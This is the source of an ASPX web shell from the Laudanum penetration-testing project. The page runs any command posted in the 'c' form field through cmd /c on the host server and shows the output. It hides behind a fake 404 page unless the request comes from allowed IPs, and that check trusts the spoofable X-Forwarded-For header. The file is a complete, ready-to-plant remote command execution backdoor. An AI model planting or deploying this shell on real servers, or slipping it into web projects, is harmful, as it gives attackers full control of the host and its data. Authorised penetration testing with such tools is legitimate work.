129 lines
4.3 KiB
Plaintext
129 lines
4.3 KiB
Plaintext
|
<%@ Page Language="C#"%>
|
||
|
|
<%@ Import Namespace="System" %>
|
||
|
|
|
||
|
|
<script runat="server">
|
||
|
|
|
||
|
|
/* *****************************************************************************
|
||
|
|
***
|
||
|
|
*** Laudanum Project
|
||
|
|
*** A Collection of Injectable Files used during a Penetration Test
|
||
|
|
***
|
||
|
|
*** More information is available at:
|
||
|
|
*** http://laudanum.secureideas.net
|
||
|
|
*** laudanum@secureideas.net
|
||
|
|
***
|
||
|
|
*** Project Leads:
|
||
|
|
*** Kevin Johnson <kjohnson@secureideas.net>
|
||
|
|
*** Tim Medin <tim@securitywhole.com>
|
||
|
|
***
|
||
|
|
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||
|
|
***
|
||
|
|
********************************************************************************
|
||
|
|
***
|
||
|
|
*** This file provides shell access to the system.
|
||
|
|
***
|
||
|
|
********************************************************************************
|
||
|
|
*** This program is free software; you can redistribute it and/or
|
||
|
|
*** modify it under the terms of the GNU General Public License
|
||
|
|
*** as published by the Free Software Foundation; either version 2
|
||
|
|
*** of the License, or (at your option) any later version.
|
||
|
|
***
|
||
|
|
*** This program is distributed in the hope that it will be useful,
|
||
|
|
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||
|
|
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||
|
|
*** GNU General Public License for more details.
|
||
|
|
***
|
||
|
|
*** You can get a copy of the GNU General Public License from this
|
||
|
|
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||
|
|
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||
|
|
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||
|
|
***
|
||
|
|
***************************************************************************** */
|
||
|
|
|
||
|
|
string stdout = "";
|
||
|
|
string stderr = "";
|
||
|
|
|
||
|
|
void die() {
|
||
|
|
//HttpContext.Current.Response.Clear();
|
||
|
|
HttpContext.Current.Response.StatusCode = 404;
|
||
|
|
HttpContext.Current.Response.StatusDescription = "Not Found";
|
||
|
|
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
|
||
|
|
HttpContext.Current.Server.ClearError();
|
||
|
|
HttpContext.Current.Response.End();
|
||
|
|
}
|
||
|
|
|
||
|
|
void Page_Load(object sender, System.EventArgs e) {
|
||
|
|
|
||
|
|
// Check for an IP in the range we want
|
||
|
|
string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
|
||
|
|
|
||
|
|
// check if the X-Fordarded-For header exits
|
||
|
|
string remoteIp;
|
||
|
|
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
|
||
|
|
remoteIp = Request.UserHostAddress;
|
||
|
|
} else {
|
||
|
|
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
|
||
|
|
}
|
||
|
|
|
||
|
|
bool validIp = false;
|
||
|
|
foreach (string ip in allowedIps) {
|
||
|
|
validIp = (validIp || (remoteIp == ip));
|
||
|
|
}
|
||
|
|
|
||
|
|
if (!validIp) {
|
||
|
|
die();
|
||
|
|
}
|
||
|
|
|
||
|
|
if (Request.Form["c"] != null) {
|
||
|
|
// do or do not, there is no try
|
||
|
|
//try {
|
||
|
|
// create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
|
||
|
|
// "/c" tells cmd that we want it to execute the command that follows, and exit.
|
||
|
|
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
|
||
|
|
|
||
|
|
// The following commands are needed to redirect the standard output and standard error.
|
||
|
|
procStartInfo.RedirectStandardOutput = true;
|
||
|
|
procStartInfo.RedirectStandardError = true;
|
||
|
|
procStartInfo.UseShellExecute = false;
|
||
|
|
// Do not create the black window.
|
||
|
|
procStartInfo.CreateNoWindow = true;
|
||
|
|
// Now we create a process, assign its ProcessStartInfo and start it
|
||
|
|
System.Diagnostics.Process p = new System.Diagnostics.Process();
|
||
|
|
p.StartInfo = procStartInfo;
|
||
|
|
p.Start();
|
||
|
|
// Get the output and error into a string
|
||
|
|
stdout = p.StandardOutput.ReadToEnd();
|
||
|
|
stderr = p.StandardError.ReadToEnd();
|
||
|
|
//}
|
||
|
|
//catch (Exception objException)
|
||
|
|
//{
|
||
|
|
}
|
||
|
|
}
|
||
|
|
</script>
|
||
|
|
<html>
|
||
|
|
<head><title>Laundanum ASPX Shell</title></head>
|
||
|
|
<body onload="document.shell.c.focus()">
|
||
|
|
|
||
|
|
<form method="post" name="shell">
|
||
|
|
cmd /c <input type="text" name="c"/>
|
||
|
|
<input type="submit"><br/>
|
||
|
|
STDOUT:<br/>
|
||
|
|
<pre><% = stdout.Replace("<", "<") %></pre>
|
||
|
|
<br/>
|
||
|
|
<br/>
|
||
|
|
<br/>
|
||
|
|
STDERR:<br/>
|
||
|
|
<pre><% = stderr.Replace("<", "<") %></pre>
|
||
|
|
|
||
|
|
|
||
|
|
</form>
|
||
|
|
|
||
|
|
<hr/>
|
||
|
|
<address>
|
||
|
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||
|
|
Written by Tim Medin.<br/>
|
||
|
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||
|
|
</address>
|
||
|
|
|
||
|
|
</body>
|
||
|
|
</html>
|